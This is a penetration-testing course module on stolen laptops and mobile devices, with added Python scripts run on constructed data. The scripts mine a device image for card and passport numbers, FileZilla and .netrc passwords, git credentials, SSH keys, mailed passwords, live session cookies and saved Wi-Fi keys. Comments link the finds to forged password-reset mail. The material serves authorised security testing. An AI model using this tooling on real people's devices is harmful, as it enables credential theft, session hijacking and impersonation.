LPTv4 Module 27: Stolen Laptop, PDAs and Cell Phones Penetration Testing

ECSA/LPT
EC-Council

Module XXVII
Stolen Laptops, PDAs, and Cell Phones Penetration Testing
Penetration Testing Roadmap

Start Here
Information Gathering
Vulnerability Analysis
External Penetration Testing
Firewall Penetration Testing
Router and Switches Penetration Testing
Internal Network Penetration Testing
IDS Penetration Testing
Wireless Network Penetration Testing
Denial of Service Penetration Testing
Password Cracking Penetration Testing
Stolen Laptop, PDAs and Cell Phones Penetration Testing
Social Engineering Penetration Testing
Application Penetration Testing
Cont’d
EC-Council
Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Penetration Testing Roadmap (cont’d)

Physical Security Penetration Testing
Database Penetration Testing
VoIP Penetration Testing
Virus and Trojan Detection
War Dialing
VPN Penetration Testing
Log Management Penetration Testing
File Integrity Checking
Blue Tooth and Hand held Device Penetration Testing
Telecommunication And Broadband Communication Penetration Testing
Email Security Penetration Testing
Security Patches Penetration Testing
Data Leakage Penetration Testing
End Here
Stolen Laptop Testing

Cell phones and PDAs carry sensitive data. Executives and mobile workers depend on these devices every day.
The loss of a PDA or BlackBerry is equivalent to losing a laptop and the sensitive data inside it.
Laptop Theft

If a laptop were lost:
• What information of a strategic nature would be disclosed?
  Real examples of this type of information include pending mergers, new product intellectual property, strategies and launch plans, and previously undisclosed financial operating results.
• What information of a tactical nature would be disclosed?
  Examples include private compensation information, plans for organizational changes, proposals to clients, and the myriad of similar information that can be gained from reading a person's email, calendar, contacts, or collection of documents and spreadsheets.
Laptop Theft (cont’d)

If a laptop were lost:
• What information about the company's network or computing infrastructure would be revealed that would facilitate an electronic attack?
  Examples of this type of information include usernames and passwords, dial-in numbers, IP addressing schemes, DNS naming conventions, ISPs used, primary mail servers, and other networking details related to connecting the laptop to the corporate or Internet environment.
• What personal information about the laptop owner can be obtained?
Penetration Testing Steps

1. Identify sensitive data in the devices
2. Look for passwords
3. Look for company infrastructure or finance documents
4. Extract the address book and phone numbers
5. Extract schedules and appointments
6. Extract applications installed on these devices
7. Extract e-mail messages from these devices
8. Gain access to server resources by using information you extracted
9. Attempt social engineering with the extracted information
Step 1: Identify Sensitive Data in the Devices

Laptops and PDAs contain sensitive information, such as:
• Company finance documents.
• Excel spreadsheets.
• Word documents.
• Email messages.
• Operations plans.

Look for sensitive data in these documents. What if this device gets into the wrong hands?
Look for Personal Information in the Stolen Laptop

• Bank account number
• Internet shopping account
• Credit card details
• Check tax return
• PAN card details
• Passport details
• Check the resume of the laptop's owner
• Check his digital signature
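Added example (not from the EC-Council module): the Step 1 data sweep and the personal-information checklist above as a script. It walks a mounted copy of the laptop's file system, keeps only the document types the module names, and flags card numbers (confirmed with the Luhn check and masked in the report), account and passport numbers, and keywords such as "merger" or "confidential". The file contents are constructed test data; the passport and account-number patterns are assumptions that must be tuned to the target country, and real Office or PDF files need a text extractor (antiword, xls2csv, pdftotext) in front of the scanner.

```python
"""Added example, not part of the EC-Council module: first-pass triage of a
recovered laptop image for the document types and personal data it lists.
Every file name and body written by demo() is constructed test data."""
import os
import re
import tempfile

# Document types the module singles out as worth reading first.
DOC_EXTENSIONS = {".xls", ".xlsx", ".doc", ".docx", ".pdf", ".pst", ".csv", ".txt"}

# The passport and account-number shapes are assumptions (a letter plus eight
# digits; an 8-12 digit run after an 'acct'/'account' label) and need tuning per
# country. Card-number candidates are confirmed with the Luhn check below.
PATTERNS = {
    "card_number": re.compile(r"\b(?:\d[ -]?){13,19}\b"),
    "passport": re.compile(r"\b[A-Z]\d{8}\b"),
    "account_number": re.compile(r"\b(?:a/c|acct|account)\D{0,10}(\d{8,12})\b", re.I),
    "keyword": re.compile(
        r"\b(confidential|merger|acquisition|salary|compensation|launch plan)\b", re.I),
}


def luhn_ok(digits: str) -> bool:
    """ISO/IEC 7812 Luhn checksum; weeds out most random digit runs."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def mask(digits: str) -> str:
    """Keep first six and last four digits so the report itself is not a liability."""
    return digits[:6] + "*" * (len(digits) - 10) + digits[-4:]


def scan_text(text: str) -> list[tuple[str, str]]:
    """Return (category, match) pairs found in one file's text."""
    hits = []
    for m in PATTERNS["card_number"].finditer(text):
        digits = re.sub(r"\D", "", m.group(0))
        if 13 <= len(digits) <= 19 and luhn_ok(digits):
            hits.append(("card_number", mask(digits)))
    for name in ("passport", "account_number", "keyword"):
        for m in PATTERNS[name].finditer(text):
            hits.append((name, m.group(m.lastindex or 0)))
    return hits


def triage(root: str) -> dict[str, list[tuple[str, str]]]:
    """Walk a mounted image and report findings per document file."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if os.path.splitext(fn)[1].lower() not in DOC_EXTENSIONS:
                continue
            path = os.path.join(dirpath, fn)
            with open(path, "rb") as f:
                # Real .doc/.xls/.pdf need a text extractor first; the demo files
                # are plain text, so a lossy decode is enough here.
                text = f.read().decode("utf-8", errors="ignore")
            hits = scan_text(text)
            if hits:
                report[os.path.relpath(path, root)] = hits
    return report


def demo() -> dict[str, list[tuple[str, str]]]:
    """Build a constructed image with a few files and triage it."""
    root = tempfile.mkdtemp()
    samples = {  # constructed content, no real data
        "Documents/q3_results.txt": "CONFIDENTIAL - pending merger with Acme. Acct no 123456789012.",
        "Documents/expenses.csv": "date,card,amount\n2009-01-02,4111 1111 1111 1111,120.00\n",
        "Documents/notes.txt": "Passport K12345678 expires 2015. Card typo 4111 1111 1111 1112.",
        "Music/song.mp3": "not a document",
    }
    for rel, body in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as f:
            f.write(body)
    return triage(root)


if __name__ == "__main__":
    for path, hits in demo().items():
        print(path, hits)
```

Run it against the mount point of the imaged disk instead of the temporary directory; the Luhn filter is what keeps invoice numbers and timestamps out of the card-number column.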
Step 2: Look for Passwords

Search for the following passwords:
• VNC password
• Email account passwords
• Active Directory passwords
• Website and browser history passwords
• Passwords stored in the registry
• FTP passwords
• SSH/Telnet passwords
• Application passwords
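Added example (not from the EC-Council module): a sweep of the plain-text and lightly-obfuscated credential stores a mobile user's home directory typically carries, covering the FTP and SSH items on the list above. It reads ~/.netrc (FTP/HTTP logins in clear), FileZilla's sitemanager.xml (the password is only base64-encoded), git's ~/.git-credentials file, and every SSH private key under ~/.ssh, reporting whether each key is passphrase-protected (a legacy PEM key announces it with a Proc-Type header; a new-format OpenSSH key names its cipher, "none" meaning clear). Paths are the tools' default Linux locations and all sample files are constructed.

```python
"""Added example, not from the EC-Council module: credential-store sweep of a
recovered home directory. demo() writes constructed files to a temp dir."""
import base64
import netrc
import os
import re
import tempfile
import xml.etree.ElementTree as ET
from urllib.parse import unquote


def parse_filezilla(xml_text: str) -> list[tuple[str, str, str]]:
    """(host, user, password) per <Server>; FileZilla 3 stores Pass with encoding="base64"."""
    out = []
    for srv in ET.fromstring(xml_text).iter("Server"):
        pw_el = srv.find("Pass")
        pw = pw_el.text if pw_el is not None else None
        if pw and pw_el.get("encoding") == "base64":
            pw = base64.b64decode(pw).decode("utf-8", "replace")
        out.append((srv.findtext("Host"), srv.findtext("User"), pw))
    return out


GIT_CRED = re.compile(r"^\w+://(?P<user>[^:@/\s]+):(?P<pw>[^@\s]*)@(?P<host>[^/\s]+)")


def parse_git_credentials(text: str) -> list[tuple[str, str, str]]:
    """~/.git-credentials: one URL per line, user and password percent-encoded."""
    out = []
    for line in text.splitlines():
        m = GIT_CRED.match(line.strip())
        if m:
            out.append((m["host"], unquote(m["user"]), unquote(m["pw"])))
    return out


KEY_RE = re.compile(r"-----BEGIN ([A-Z ]*?)PRIVATE KEY-----\n(.*?)-----END", re.S)


def ssh_key_status(text: str):
    """None if not a private key; otherwise 'encrypted', 'unencrypted' or 'unknown'."""
    m = KEY_RE.search(text)
    if not m:
        return None
    kind, body = m.group(1).strip(), m.group(2)
    if kind == "OPENSSH":
        # New OpenSSH format: "openssh-key-v1\0", then a length-prefixed cipher name.
        raw = base64.b64decode("".join(body.split()))
        magic = b"openssh-key-v1\x00"
        if not raw.startswith(magic):
            return "unknown"
        n = int.from_bytes(raw[len(magic):len(magic) + 4], "big")
        cipher = raw[len(magic) + 4:len(magic) + 4 + n].decode()
        return "unencrypted" if cipher == "none" else "encrypted"
    # Legacy PEM keys announce encryption in a header line.
    return "encrypted" if "Proc-Type: 4,ENCRYPTED" in body else "unencrypted"


def sweep(home: str) -> dict:
    """Collect findings from the default store locations under one home directory."""
    findings = {"netrc": [], "filezilla": [], "git": [], "ssh_keys": []}
    p = os.path.join(home, ".netrc")
    if os.path.exists(p):
        for host, (login, _acct, pw) in netrc.netrc(p).hosts.items():
            findings["netrc"].append((host, login, pw))
    p = os.path.join(home, ".config", "filezilla", "sitemanager.xml")
    if os.path.exists(p):
        with open(p) as f:
            findings["filezilla"] = parse_filezilla(f.read())
    p = os.path.join(home, ".git-credentials")
    if os.path.exists(p):
        with open(p) as f:
            findings["git"] = parse_git_credentials(f.read())
    ssh_dir = os.path.join(home, ".ssh")
    if os.path.isdir(ssh_dir):
        for fn in sorted(os.listdir(ssh_dir)):
            with open(os.path.join(ssh_dir, fn), errors="ignore") as f:
                status = ssh_key_status(f.read())
            if status:
                findings["ssh_keys"].append((fn, status))
    return findings


def demo() -> dict:
    """Constructed home directory: one store of each kind, then sweep it."""
    home = tempfile.mkdtemp()
    openssh_blob = b"openssh-key-v1\x00" + b"\x00\x00\x00\x04none" + b"\x00\x00\x00\x04none"
    files = {  # constructed
        ".netrc": "machine ftp.example.com login jdoe password Summer2009!\n",
        ".config/filezilla/sitemanager.xml": (
            "<FileZilla3><Servers><Server><Host>sftp.example.com</Host><Port>22</Port>"
            "<User>jdoe</User><Pass encoding=\"base64\">"
            + base64.b64encode(b"Winter2009!").decode() + "</Pass></Server></Servers></FileZilla3>"),
        ".git-credentials": "https://jdoe:s3cret%21@git.example.com\n",
        ".ssh/id_rsa": ("-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
                        "DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n\nAAAA\n"
                        "-----END RSA PRIVATE KEY-----\n"),
        ".ssh/id_ed25519": ("-----BEGIN OPENSSH PRIVATE KEY-----\n"
                            + base64.b64encode(openssh_blob).decode()
                            + "\n-----END OPENSSH PRIVATE KEY-----\n"),
    }
    for rel, body in files.items():
        path = os.path.join(home, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as f:
            f.write(body)
    return sweep(home)
```

Point sweep() at the user's home directory on the mounted image. An unencrypted key plus a known_hosts file is a direct route into Step 8; an encrypted one goes to the password-cracking phase instead.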
Step 3: Look for Company Infrastructure or Finance Documents

Sometimes the laptop might contain company infrastructure documents, such as:
• Building plans.
• Plan of operations.
• Overseas operations and procedures.
• Company handbooks or manuals.
• Contracts and agreements.
• NDA documents.
• Bank statements.
• Auditing information.
• Insurance documents.

What if this information gets into the wrong hands?
Step 4: Extract the Address Book and Phone Numbers

PDAs and laptops contain address books. Look for the following data:
• Name.
• Address.
• Telephone number.
• Cell phone number.
• Fax number.
• Email address.
• Birthdate.
• Notes.
• Picture.
Step 5: Extract Schedules and Appointments

Look for schedule and appointment information in the PDA and laptop:
• What is the time and date of the meeting?
• Who are the attendees?
• What is the location of the meeting?
• What is the agenda for the meeting?
• Has the meeting been confirmed?
• How long is the meeting?
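Added example (not from the EC-Council module) covering Steps 4 and 5 together: PDA and phone sync software leaves the address book and calendar on the laptop as vCard (.vcf) and iCalendar (.ics) exports, and this parser pulls exactly the fields the two checklists ask for: name, phone numbers by type, fax, email, address, birthday, notes and whether a photo is present; meeting start, duration, location, agenda, confirmation status, organizer and attendees. It handles the two formats' line folding, property parameters (TYPE=, CN=, TZID=) and text escaping. The VCF and ICS inputs are constructed.

```python
"""Added example, not from the EC-Council module: vCard / iCalendar extraction
for the address-book and appointment checklists. VCF and ICS are constructed."""
import re
from datetime import datetime


def unfold(text: str) -> str:
    """A line starting with a space or tab continues the previous line."""
    return re.sub(r"\r?\n[ \t]", "", text)


def unescape(value: str) -> str:
    """TEXT escaping shared by both formats."""
    return value.replace("\\,", ",").replace("\\;", ";").replace("\\n", "\n").replace("\\N", "\n")


def components(text: str, name: str) -> list[dict]:
    """Each BEGIN:<name>..END:<name> block as {PROP: [(params, raw_value), ...]}."""
    blocks, cur = [], None
    for line in unfold(text).splitlines():
        if line.upper() == f"BEGIN:{name}":
            cur = {}
        elif line.upper() == f"END:{name}":
            blocks.append(cur)
            cur = None
        elif cur is not None and ":" in line:
            key, _, value = line.partition(":")
            prop, *params = key.split(";")
            cur.setdefault(prop.upper(), []).append((params, value))
    return blocks


def param(params: list[str], name: str):
    """Value of a NAME=value parameter (case-insensitive name), else None."""
    for p in params:
        if p.upper().startswith(name.upper() + "="):
            return p.split("=", 1)[1].strip('"')
    return None


def first(block: dict, prop: str):
    return block[prop][0][1] if prop in block else None


def contacts(vcf: str) -> list[dict]:
    out = []
    for card in components(vcf, "VCARD"):
        phones = {}
        for params, number in card.get("TEL", []):
            # vCard 3.0: TEL;TYPE=CELL:...   vCard 2.1: TEL;CELL:...
            kind = param(params, "TYPE") or ",".join(p for p in params if "=" not in p) or "voice"
            phones[kind.lower()] = number
        adr = first(card, "ADR")  # structured: PO box;ext;street;city;region;postcode;country
        out.append({
            "name": unescape(first(card, "FN") or ""),
            "org": unescape(first(card, "ORG") or ""),
            "phones": phones,
            "emails": [v for _, v in card.get("EMAIL", [])],
            "address": ", ".join(unescape(p) for p in adr.split(";") if p) if adr else None,
            "birthday": first(card, "BDAY"),
            "notes": unescape(first(card, "NOTE") or "") or None,
            "has_photo": "PHOTO" in card,
        })
    return out


def parse_dt(value: str):
    """20091012T140000Z, 20091012T140000 (TZID carried as a parameter) or 20091012 (all-day)."""
    for fmt in ("%Y%m%dT%H%M%SZ", "%Y%m%dT%H%M%S", "%Y%m%d"):
        try:
            return datetime.strptime(value, fmt)
        except ValueError:
            continue
    return None


def meetings(ics: str) -> list[dict]:
    out = []
    for ev in components(ics, "VEVENT"):
        start = parse_dt(first(ev, "DTSTART") or "")
        end = parse_dt(first(ev, "DTEND") or "")
        attendees = [(param(p, "CN"), v.replace("mailto:", "", 1)) for p, v in ev.get("ATTENDEE", [])]
        out.append({
            "summary": unescape(first(ev, "SUMMARY") or ""),
            "start": start,
            "duration_min": int((end - start).total_seconds() // 60) if start and end else None,
            "location": unescape(first(ev, "LOCATION") or ""),
            "agenda": unescape(first(ev, "DESCRIPTION") or ""),
            "confirmed": (first(ev, "STATUS") or "").upper() == "CONFIRMED",
            "organizer": (first(ev, "ORGANIZER") or "").replace("mailto:", "", 1),
            "attendees": attendees,
        })
    return out


VCF = """BEGIN:VCARD
VERSION:3.0
FN:Jane Doe
N:Doe;Jane;;;
ORG:Example Corp;Finance
TITLE:CFO
TEL;TYPE=WORK,VOICE:+1-555-0100
TEL;TYPE=CELL:+1-555-0101
TEL;TYPE=FAX:+1-555-0102
EMAIL;TYPE=INTERNET:jane.doe@example.com
ADR;TYPE=WORK:;;1 Main St;Springfield;IL;62701;USA
BDAY:1970-04-05
NOTE:Badge PIN 4421 - do not
  share
END:VCARD
"""

ICS = """BEGIN:VCALENDAR
VERSION:2.0
BEGIN:VEVENT
UID:1@example.com
DTSTART:20091012T140000Z
DTEND:20091012T153000Z
SUMMARY:Project Falcon - board pre-read
LOCATION:Boardroom 4\\, HQ
DESCRIPTION:Walk through acquisition term sheet before announcement
STATUS:CONFIRMED
ORGANIZER;CN=Jane Doe:mailto:jane.doe@example.com
ATTENDEE;CN=Bob Lee;ROLE=REQ-PARTICIPANT:mailto:bob.lee@example.com
ATTENDEE;CN=Outside Counsel:mailto:counsel@lawfirm.example
END:VEVENT
END:VCALENDAR
"""
```

The folded NOTE line and the escaped comma in LOCATION are the two places naive line-by-line greps lose data; a confirmed meeting with an outside attendee and an acquisition agenda is exactly the material Step 9 builds a pretext from.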
Step 6: Extract Applications Installed on these Devices

Applications can reveal sensitive data. Look for data in the applications installed on the laptop.
Example:
• Finance software such as Quicken and Microsoft Money can provide rich information.
Step 7: Extract Email Messages from these Devices

Email messages can provide a lot of sensitive information. Sometimes you might find passwords and access codes.
Scan the entire email content for information that could be used to gain access to the system.
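Added example (not from the EC-Council module): the scan this step describes, run over an mbox mail store recovered from the laptop (an Outlook .pst would first be converted with readpst). It does two things the later steps need: builds a table of who the owner corresponds with and how often (the raw material for Step 9), and searches each message body for a label such as "password" or "access code" followed by a value (the material for Step 8). The two messages are constructed; the keyword list is a starting point, not exhaustive.

```python
"""Added example, not from the EC-Council module: mbox scan for correspondents
and credentials handed over in mail. MBOX is constructed."""
import mailbox
import os
import re
import tempfile
from email.utils import getaddresses

# Label, then a separator ("is", ":" or "="), then the secret up to whitespace or punctuation.
CRED_RE = re.compile(
    r"(?i)\b(password|passwd|pwd|pin|passcode|access code)\b\s*(?:is|:|=)\s*([^\s,.;]{3,})")


def body_text(msg) -> str:
    """Concatenate the text/plain parts of a (possibly multipart) message."""
    out = []
    for part in msg.walk():
        if part.get_content_type() == "text/plain":
            payload = part.get_payload(decode=True) or b""
            out.append(payload.decode(part.get_content_charset() or "utf-8", "replace"))
    return "\n".join(out)


def scan_mbox(path: str):
    """Return ({address: {"name", "count"}}, [(subject, label, secret), ...])."""
    contacts, creds = {}, []
    for msg in mailbox.mbox(path):
        headers = msg.get_all("From", []) + msg.get_all("To", []) + msg.get_all("Cc", [])
        for name, addr in getaddresses(headers):
            if addr:
                entry = contacts.setdefault(addr.lower(), {"name": name, "count": 0})
                entry["count"] += 1
        for m in CRED_RE.finditer(body_text(msg)):
            creds.append((msg.get("Subject", ""), m.group(1).lower(), m.group(2)))
    return contacts, creds


MBOX = """From helpdesk@example.com Mon Oct 12 09:00:00 2009
From: IT Helpdesk <helpdesk@example.com>
To: Jane Doe <jane.doe@example.com>
Subject: Your VPN account
Content-Type: text/plain; charset=utf-8

Jane, your VPN username is jdoe and the initial password is Autumn!2009
Please change it after first login.

From bob.lee@example.com Mon Oct 12 10:00:00 2009
From: Bob Lee <bob.lee@example.com>
To: Jane Doe <jane.doe@example.com>
Cc: counsel@lawfirm.example
Subject: Re: Project Falcon
Content-Type: text/plain; charset=utf-8

Dial-in for Thursday: +1 555 0199, access code: 771204.
Bob
"""


def demo():
    """Write the constructed mbox to a temp file and scan it."""
    path = os.path.join(tempfile.mkdtemp(), "mail.mbox")
    with open(path, "w") as f:
        f.write(MBOX)
    return scan_mbox(path)
```

The helpdesk message is the typical find: an initial VPN password that the user may never have changed. The correspondent table tells you which sender a forged "password reset" mail should impersonate.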
Step 8: Gain Access to Server Resources by Using Information You Extracted

Gain access to network resources using information from the PDA and laptops.
Step 9: Attempt Social Engineering with the Extracted Information

The extracted information could be used for social engineering as well.
Check for BIOS Password

Check whether the BIOS password, boot password, or hard disk password is enabled.
Check whether the BIOS setting has the hard disk as a bootable device.
Check whether the user has a different username and password from the domain logon used on the laptop.
Look into the Encrypted File

Check whether any file does not appear to be clear text; if so, it is probably encrypted.
Try to decrypt the file using cryptographic tools.
Gather information from that file.
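Added example (not from the EC-Council module): the "not clear text" test made measurable. Each file is first matched against a short magic-byte table, because compressed containers (zip and the Office .docx/.xlsx family, PDF streams, gzip, 7-Zip) also look random and must not be mistaken for ciphertext; whatever remains is scored by printable ratio and Shannon entropy, and near-8-bits-per-byte data with no recognizable header is the candidate set to hand to decryption tooling (TrueCrypt-style containers deliberately have no plaintext header, so entropy is the only signal left). Sample data is constructed; the SHA-256 chain stands in for ciphertext so the demo is reproducible.

```python
"""Added example, not from the EC-Council module: entropy- and magic-based
triage for encrypted files. SAMPLES is constructed."""
import hashlib
import math
from collections import Counter

MAGIC = {
    b"PK\x03\x04": "zip container (also docx/xlsx/pptx/jar)",
    b"%PDF": "pdf",
    b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1": "ole2 compound file (doc/xls/ppt)",
    b"!BDN": "outlook pst",
    b"\x1f\x8b": "gzip",
    b"7z\xbc\xaf\x27\x1c": "7-zip",
    b"LUKS\xba\xbe": "luks encrypted volume header",
    b"-----BEGIN PGP MESSAGE-----": "pgp ascii armor",
}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0 (constant) to 8.0 (uniform)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def printable_ratio(data: bytes) -> float:
    return sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13)) / max(len(data), 1)


def classify(data: bytes) -> str:
    """'known:<label>', 'text', 'encrypted_or_compressed', or 'binary'."""
    for magic, label in MAGIC.items():
        if data.startswith(magic):
            return f"known:{label}"
    if printable_ratio(data) > 0.95:
        return "text"
    # Well-encrypted data is indistinguishable from random: about 7.9+ bits/byte on a few KB.
    if shannon_entropy(data) > 7.5:
        return "encrypted_or_compressed"
    return "binary"


def deterministic_noise(n: int) -> bytes:
    """SHA-256 chain standing in for ciphertext so the demo is reproducible."""
    out, block = b"", b"seed"
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return out[:n]


def survey(files: dict) -> dict:
    """Classify a {name: bytes} map; in practice read the bytes from the mounted image."""
    return {name: classify(data) for name, data in files.items()}


SAMPLES = {  # constructed
    "budget.xlsx": b"PK\x03\x04" + b"\x00" * 60,
    "letter.txt": b"Dear Bob, the board meets Thursday to approve the merger.\n" * 20,
    "vault.dat": deterministic_noise(4096),
    "cache.bin": bytes(range(16)) * 256,
}

if __name__ == "__main__":
    for name, verdict in survey(SAMPLES).items():
        print(f"{name:12s} {verdict}")
```

Reading only the first few kilobytes of each file is enough for the verdict; a file whose extension says .xls but whose bytes are headerless noise is the one to carry forward to the cryptographic tools.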
Check Cookies in Web Browsers

Check the following:
• Cookies
• History file
• Temp files
• Recycle bin

Check whether the above files contain any information.
Check whether any password file is available.
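Added example (not from the EC-Council module): reading the Firefox profile artefacts behind the first two items above straight from the recovered disk. cookies.sqlite yields session cookies that have not yet expired, i.e. a logged-in webmail or portal session the thief inherits; places.sqlite yields internal hostnames (intranet, VPN portal, webmail) that reveal the company's infrastructure for the next step. Saved browser passwords are the "password file" on the slide: Firefox keeps them in logins.json, encrypted with a key from key4.db, and they are not decoded here. The two tables use the real Firefox column names but are cut down to the columns queried, and every row is constructed.

```python
"""Added example, not from the EC-Council module: live session cookies and
internal hosts from a Firefox profile. build_profile() writes constructed rows."""
import os
import re
import sqlite3
import tempfile

SESSION_NAME = re.compile(r"(?i)(sess|sid|auth|token|login|remember)")
INTERNAL_HOST = re.compile(
    r"https?://([a-z0-9.-]*(?:intranet|vpn|mail|owa|sharepoint|citrix|remote|portal)[a-z0-9.-]*)", re.I)


def live_session_cookies(cookies_db: str, now: int) -> list[tuple[str, str, str]]:
    """Unexpired cookies whose name looks like a session or auth token."""
    con = sqlite3.connect(cookies_db)
    try:
        rows = con.execute("SELECT host, name, value, expiry FROM moz_cookies").fetchall()
    finally:
        con.close()
    return [(host, name, value) for host, name, value, expiry in rows
            if expiry > now and SESSION_NAME.search(name)]


def internal_hosts(places_db: str) -> dict[str, int]:
    """Internal-looking hostnames from history, with total visit counts."""
    con = sqlite3.connect(places_db)
    try:
        rows = con.execute("SELECT url, visit_count FROM moz_places").fetchall()
    finally:
        con.close()
    hosts: dict[str, int] = {}
    for url, visits in rows:
        m = INTERNAL_HOST.match(url or "")
        if m:
            h = m.group(1).lower()
            hosts[h] = hosts.get(h, 0) + (visits or 0)
    return hosts


NOW = 1_255_000_000  # fixed 'now' (October 2009) so the demo is reproducible


def build_profile(profile_dir: str) -> None:
    """Cut-down cookies.sqlite and places.sqlite with constructed rows."""
    con = sqlite3.connect(os.path.join(profile_dir, "cookies.sqlite"))
    con.execute("CREATE TABLE moz_cookies (id INTEGER PRIMARY KEY, name TEXT, value TEXT, host TEXT, "
                "path TEXT, expiry INTEGER, isSecure INTEGER, isHttpOnly INTEGER)")
    con.executemany("INSERT INTO moz_cookies (name, value, host, path, expiry, isSecure, isHttpOnly) "
                    "VALUES (?,?,?,?,?,?,?)", [
        ("sessionid", "9f2c7a1e", "mail.example.com", "/", NOW + 3600, 1, 1),  # live webmail session
        ("auth_token", "expired", "vpn.example.com", "/", NOW - 60, 1, 1),     # already expired
        ("_ga", "GA1.2.1", "ads.example.net", "/", NOW + 10**7, 0, 0),         # tracker, ignored
    ])
    con.commit()
    con.close()
    con = sqlite3.connect(os.path.join(profile_dir, "places.sqlite"))
    con.execute("CREATE TABLE moz_places (id INTEGER PRIMARY KEY, url TEXT, title TEXT, "
                "visit_count INTEGER, last_visit_date INTEGER)")
    con.executemany("INSERT INTO moz_places (url, title, visit_count, last_visit_date) VALUES (?,?,?,?)", [
        ("https://intranet.example.com/hr/payroll", "Payroll", 12, NOW * 10**6),
        ("https://vpn.example.com/login", "SSL VPN", 30, NOW * 10**6),
        ("https://www.news.example/", "News", 100, NOW * 10**6),
    ])
    con.commit()
    con.close()


def demo():
    """Build the constructed profile and run both queries against it."""
    profile = tempfile.mkdtemp()
    build_profile(profile)
    return (live_session_cookies(os.path.join(profile, "cookies.sqlite"), NOW),
            internal_hosts(os.path.join(profile, "places.sqlite")))
```

Copy the profile's .sqlite files off the image before querying (Firefox holds them locked on a running system and may leave a -wal journal beside them), and pass the real current time as `now`.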
Install Software

Install software for changing the password:
• Try it for changing the existing password.

Install data recovery software on the laptop:
• Use it to extract the data that has been deleted.
Attempt to Enable Wireless

Switch on wireless or Bluetooth near the company campus.
Scan for the LAN network of the company.
Locate the LAN network and search for its SSID in the laptop.
Check whether the SSID is asking for a password.
Check password strength and try to break it by password cracking techniques.
Enable wireless or Bluetooth to get connected with the network.
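Added example (not from the EC-Council module): before walking the campus to find the company SSID, read what the laptop already knows. On a booted Windows laptop `netsh wlan show profiles` lists the saved networks and `netsh wlan show profile name=<ssid> key=clear` prints each profile's authentication type and pre-shared key (an elevated prompt is normally needed for the key field). The code below runs those commands and parses the result, applying a first-pass strength check to any recovered PSK. For the demo it is fed a constructed copy of netsh's output so it runs anywhere; the English field labels are an assumption, since localized Windows prints translated ones.

```python
"""Added example, not from the EC-Council module: saved Wi-Fi profiles and
PSKs via netsh. FAKE_OUTPUT is a constructed stand-in for netsh's output."""
import re
import subprocess

PROFILE_LINE = re.compile(r"^\s*All User Profile\s*:\s*(.+?)\s*$", re.M)
FIELDS = {
    "ssid": re.compile(r"SSID name\s*:\s*\"?([^\"\r\n]+?)\"?\s*$", re.M),
    "authentication": re.compile(r"Authentication\s*:\s*(.+?)\s*$", re.M),
    "cipher": re.compile(r"Cipher\s*:\s*(.+?)\s*$", re.M),
    "key": re.compile(r"Key Content\s*:\s*(.+?)\s*$", re.M),
}


def parse_profile_list(text: str) -> list[str]:
    return PROFILE_LINE.findall(text)


def weak_psk_reasons(psk: str) -> list[str]:
    """Cheap triage; anything flagged here goes to a dictionary attack before brute force."""
    reasons = []
    if len(psk) < 12:
        reasons.append("short (<12 chars)")
    if psk.isdigit():
        reasons.append("digits only")
    if re.fullmatch(r"[A-Za-z]+\d{1,4}", psk):
        reasons.append("word followed by digits")
    return reasons


def parse_profile(text: str) -> dict:
    out = {}
    for name, rx in FIELDS.items():
        m = rx.search(text)
        out[name] = m.group(1) if m else None
    out["weak_psk_reasons"] = weak_psk_reasons(out["key"]) if out["key"] else []
    return out


def collect(run=None) -> dict[str, dict]:
    """Profile name -> parsed fields. `run` defaults to executing netsh (Windows only)."""
    if run is None:
        def run(args):
            return subprocess.run(args, capture_output=True, text=True, check=False).stdout
    profiles = {}
    for name in parse_profile_list(run(["netsh", "wlan", "show", "profiles"])):
        text = run(["netsh", "wlan", "show", "profile", f"name={name}", "key=clear"])
        profiles[name] = parse_profile(text)
    return profiles


FAKE_OUTPUT = {  # constructed; shapes follow netsh's English output
    "profiles": (
        "\nProfiles on interface Wi-Fi:\n\nGroup policy profiles (read only)\n"
        "---------------------------------\n    <None>\n\nUser profiles\n-------------\n"
        "    All User Profile     : CorpWiFi\n    All User Profile     : Home-Net\n"),
    "CorpWiFi": (
        "\nProfile CorpWiFi on interface Wi-Fi:\n=======================================\n\n"
        "Applied: All User Profile\n\nProfile information\n-------------------\n"
        "    Version                : 1\n    Type                   : Wireless LAN\n"
        "    Name                   : CorpWiFi\n\nConnectivity settings\n---------------------\n"
        "    Number of SSIDs        : 1\n    SSID name              : \"CorpWiFi\"\n"
        "    Network type           : Infrastructure\n\nSecurity settings\n-----------------\n"
        "    Authentication         : WPA2-Personal\n    Cipher                 : CCMP\n"
        "    Security key           : Present\n    Key Content            : Corp2009\n"),
    "Home-Net": (
        "\nProfile Home-Net on interface Wi-Fi:\n\n    SSID name              : \"Home-Net\"\n"
        "    Authentication         : WPA2-Personal\n    Cipher                 : CCMP\n"
        "    Key Content            : 7Gx!pq2R9mLvZt4w\n"),
}


def fake_run(args: list[str]) -> str:
    """Stand-in for netsh used by the demo and tests."""
    if args[3] == "profiles":
        return FAKE_OUTPUT["profiles"]
    return FAKE_OUTPUT[args[4].split("=", 1)[1]]


if __name__ == "__main__":
    for name, info in collect(fake_run).items():
        print(name, info["authentication"], info["key"], info["weak_psk_reasons"])
```

A recovered corporate PSK removes the cracking step entirely; an enterprise (802.1X) profile instead shows which certificate or domain credential the laptop uses, which points back at the passwords gathered in Step 2.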
Summary

All the information that is extracted in the steps mentioned is documented for analysis.
In the first step, the sensitive data in the device is identified, such as company finance documents, email messages, and Excel spreadsheets.
In the second step, we looked for passwords such as VNC and email account passwords.
